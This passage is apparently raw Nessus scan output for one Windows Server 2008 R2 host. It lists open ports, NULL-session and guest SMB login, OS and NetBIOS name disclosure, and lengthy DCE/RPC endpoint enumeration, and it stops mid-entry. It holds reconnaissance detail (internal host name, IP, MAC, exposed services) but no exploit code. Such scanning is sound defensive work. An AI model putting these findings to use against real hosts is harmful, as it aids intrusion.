+If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + QA3APP01 = Computer name + RB = Workgroup / Domain name + QA3APP01 = File Server Service + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:b8 + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.21 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.21 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49176 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49176 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49176 +IP : 10.31.112.21 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49175 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49175 +IP : 10.31.112.21 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.21 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.21 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.21 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49174 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49174 +IP : 10.31.112.21 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP01 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP01 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP01 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E5C0 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E5C0 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-df443e89ecf8c15e6d + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc0386841 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-2f4f71aa232ed94199 + +Object UUID : 8c918689-bb45-4b71-8eff-4eab44b2e01d +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-d603871610f690971c + +Object UUID : faabd54f-4428-4ba7-a096-a1b98a0fb0aa +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-d603871610f690971c + +Object UUID : d0c76d63-b3e4-463a-a1a1-1a532d15c8fa +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-d603871610f690971c + +Object UUID : 8e902a22-cc79-4b73-95d0-3dea45234aca +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-d603871610f690971c + +Object UUID : f550e013-7e90-4af4-b0c7-ed54b5fc6e51 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLE558D999F1ED44F9F88802972F642 + +Object UUID : f550e013-7e90-4af4-b0c7-ed54b5fc6e51 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-d217da6c46bd89bd1d + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-3a8836ac77808ce09b + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-ec1a17ea2447be0719 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-163d12dace17bd218f + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-163d12dace17bd218f + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-163d12dace17bd218f + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLE17584212A1D44C5494A3A1EF3393 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-6fbcdbc93ad48fa988 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLE17584212A1D44C5494A3A1EF3393 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-6fbcdbc93ad48fa988 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE6E49FAF9983E446E92AE98F45316 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE6E49FAF9983E446E92AE98F45316 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE6E49FAF9983E446E92AE98F45316 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE6E49FAF9983E446E92AE98F45316 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE6E49FAF9983E446E92AE98F45316 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLE6E49FAF9983E446E92AE98F45316 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation 